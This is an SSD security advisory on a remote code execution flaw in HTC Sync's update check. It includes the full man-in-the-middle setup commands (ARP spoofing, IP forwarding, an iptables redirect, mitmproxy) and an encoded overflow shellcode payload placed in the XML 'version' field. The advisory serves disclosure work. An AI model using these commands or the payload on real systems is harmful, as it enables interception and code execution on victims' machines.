SSD Advisory – HTC Sync Remote Code Execution
Credit to Author: SSD / Research Team| Date: Mon, 27 Feb 2017 10:19:14 +0000
Vulnerabilities Summary
The following advisory describes a remote code execution (RCE) found in HTC Sync version v3.3.63.
Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor response
The vulnerability was not reported to the vendor because the product has reached end of life on 31 August 2016 and was replaced by HTC Sync Manager which is not vulnerable to this vulnerability.
Vulnerability Details
HTC sync contains a remotely exploitable vulnerability within the latest HTC Sync (v3.3.63) software. During startup or if explicitly triggered by the user, HTC Sync checks for latest versions by sending an HTTP request to htc.com and then parses its reply (XML format).
In particular, the application first requests:
Which contains a link to the download URI which is available in:
1 | http://dl2.htc.com/download/pcs/Release1/HTCSyncRelease.xml |
By modifying e.g. the “version” field in the XML document an attacker can inject arbitrary code that gets executed on the victims machine.
Proof of Concept
An attacker that can place himself man-in-the-middle, either through ARP spoofing or DNS poisoning can intercept traffic and provide an overly long XML parameter which leads to remote code execution on the victims machine.
We used Kali Linux to set up man in the middle attack:
- Enable arp spoofing
- Enable IP forwarding
- Add ip tables rule for mitm proxy:
- Start mitmproxy
- Intercept and modify traffic by hand
1 2 | arpspoof –i eth0 –t 192.168.8.90 192.168.8.8 (from victim to mitm) arpspoof –i eth0 –t 192.168.8.90 192.168.8.1 (from router to victim) |
1 | echo 1 >> /proc/sys/net/ipv4/ip_forwarding |
1 | iptables –t nat –A PREROUTING –i eth0 –p tcp —dport 80 –j REDIRECT —to–port 8080 |
1 | mitmproxy –T —host |
The “version” string for popping up calc.exe is:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA۫邐C췙狙忴套䥉䥉䥉䥉䥉䍃䍃䍃儷橚塁ぐぁ歁䅁㉑䉁䈲あ䉂䉁偘䄸畂䥊䱋硩牏偅灗灷瀱 奍敘煄偉琱䭬ぶぐ歮牂䱔䭌扃呔䭌剂䡦漶睌穳嘷兖佋䱮汕ㅅ污扦䱆灅兩潊浖煗圹戸剪牂㝆歮牒げ䭬䩐 汵䭬求儴塢捨㠷煷ㅮ煂䭬祢け煗㍎䭌祣桗獩婦楢歎呦䭌儵嘸潙䱎ㅯ佸浆煇杊䡧灙㕤噊䍄浱根歅浑呷㕄 瑩档歎㡆㑑慦䌹噣䭌汆䬰歎桳汷慶䍩歎吵䭌慖偨㥋瑣瑕呷歓䭑慰䤱婰ㅖ潹灹潃漳婐䭬㈲䭪䵌䵱橐ㅓ䵌啍 剮灗瀷偅ざ塳兆歮佒坍潙畊䭏灨敍㉙晳桰䙎啌浭浯佫敫䱇㙳䱃婕偭歉瀹㔴䔴䭏坡㍢剂佢樰灧捃漹番䍲关 氰千湔䕂塒㕵こ䅁 |